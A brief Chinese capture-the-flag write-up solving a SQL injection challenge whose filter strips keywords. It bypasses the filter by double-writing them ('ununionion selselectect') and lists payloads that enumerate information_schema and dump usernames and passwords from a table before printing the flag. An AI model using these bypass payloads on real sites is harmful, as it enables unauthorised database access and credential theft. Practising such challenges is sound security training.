题目中过滤了or,需要使用万能密码的变形(将or替换成 || )
登进去没什么用,我们直接在用户名中输入or,select,union,where,from等词语全被过滤了,那还玩个锤子
网上一搜需要使用双写绕过
我们输入1' || 1=1 order by 3 #,发现or和by被过滤掉了
所以需要双写 or 和 by 输入 1' || 1=1 oorrder bbyy 3 #
登陆成功,说明有三列
1' ununionion selselectect 1,2,database() #
输入1' ununionion selselectect 1,2,group_concat(table_name) frfromom information_schema.tables whwhereere table_schema='geek' #
information里头有or,也被过滤了,所以需要双写
1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #
1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='geek' aandnd table_name='b4bsql'#
1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#
flag{fe9beefe-0390-4b0c-8214-57bfbaa43ae7}
和Lovely SQL1一个套路,只不过需要双写绕过